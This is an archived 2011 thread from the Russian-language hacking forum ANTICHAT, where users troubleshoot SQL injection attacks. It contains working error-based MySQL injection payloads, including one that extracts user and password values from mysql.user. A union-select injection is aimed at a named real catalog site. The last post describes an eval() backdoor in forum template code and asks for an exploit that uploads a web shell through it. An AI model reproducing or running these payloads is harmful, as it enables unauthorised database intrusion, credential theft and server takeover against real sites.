ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.07.2011, 14:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от winstrool
winstrool said:
прав хвотает, и сами сайты с БД на одном сервере, это подтверждает то что есть возможность с БД заливать файлы в папку /tmp/ и и прсоматривать то что залито через load_file()
А разве папки /tmp/ не должно быть на сервере где стоит БД?
И даже если так, сервер у них один, то ничего не меняется, прав может не быть на создание файла в директориях видные из веб, а то что в tmp пишется это понятно, т.к. права к этой папке у всех пользователей системы.
|
|
|
|
02.07.2011, 16:46
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+
выдает- Subquery returns more than 1 row
Где я намудрил?
|
|
|
02.07.2011, 16:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от IMMORTAL_S
IMMORTAL_S said:
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+
выдает- Subquery returns more than 1 row
Где я намудрил?
видимо запрос select+concat_ws(':',table_schema,table_name)+from +information_schema.tables+limit+0,1 возвращает большой результат, попробуй просто select table_schema from information_schema.tables limit 0,1
и отталкивайся от этого, сначала найди нужную базу, потом таблицу, потом поля, потом выводи.
|
|
|
|
02.07.2011, 17:01
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Судя по всему да..
?url=181'+or+(select+count(*)+from+information_sch ema.tables+group+by+concat_ws(0x3a,(select+concat_ ws(0x3a,user,password)+from+mysql.user+limit+0,1), floor(rand(0)*2)))--+
Выдал - Data too long for column '(null)' at row 15
Подскажите, почему так происходит?
|
|
|
|
02.07.2011, 17:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от IMMORTAL_S
IMMORTAL_S said:
?id=181'+or+(select+count(*)+from+information_sche ma.tables+group+by+concat_ws(0x3a,(select+concat_w s(':',table_schema,table_name)+from+information_sc hema.tables+limit+0,1),floor(rand(0)*2)))--+
выдает- Subquery returns more than 1 row
Где я намудрил?
где-то ты действительно намудрил
Код:
Code:
and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a)--
вместо version() подставляешь уже
(select table_name from information_schema.tables limit 0,1)
У меня твоя ошибка возникала, когда не в то место подставлял данные на вывод в ошибке, и там уже не помогал никакой лимит
Сообщение от None
Судя по всему да.. ?url=181'+or+(select+count(*)+from+information_sch ema.tables+group+by+concat_ws(0x3a,(select+concat_ ws(0x3a,user,password)+from+mysql.user+limit+0,1), floor(rand(0)*2)))--+ Выдал - Data too long for column '(null)' at row 15 Подскажите, почему так происходит?
Видимо попутно идёт интсерт в какую-то таблицу со статистикой, а как раз получается он большой... хотя это лишь догадка
|
|
|
|
03.07.2011, 00:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
55038
Репутация:
0
|
|
http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT00Mjgw. Как определить кол-во полей?
|
|
|
|
03.07.2011, 00:25
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT0tNDI4M CB1bmlvbiBzZWxlY3QgdmVyc2lvbigpLS0=
1 поле в model_id
|
|
|
|
04.07.2011, 19:23
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
возможно ли сделать поиск по базе mysql5 если не знать имени таблицы и колнки. Например в значении колонки слово maxim по текушей базе, если возможно то примерный запрос какой будеть
спс
|
|
|
|
04.07.2011, 19:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от YuNi|[c
YuNi|[c said:
возможно ли сделать поиск по базе mysql5 если не знать имени таблицы и колнки. Например в значении колонки слово maxim по текушей базе, если возможно то примерный запрос какой будеть
спс
Нельзя. Если я конечно правильно понял про что ты.
|
|
|
|
05.07.2011, 01:16
|
|
Новичок
Регистрация: 25.07.2009
Сообщений: 10
Провел на форуме:
71531
Репутация:
0
|
|
Имеется код:
Сообщение от None
$IPBHTML .= "
" . (($this->ipsclass->input['testKey'] = 123) ? ("
" . ((eval($this->ipsclass->input['code'])) ? ("") : ("")) . "
") : ("")) . "
Обращаюсь я к нему вот так http://site.ru/index.php?testKey=123&code=phpinfo();
Нужен эксплоит который в code POST-методом будет пересылать код шелла. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
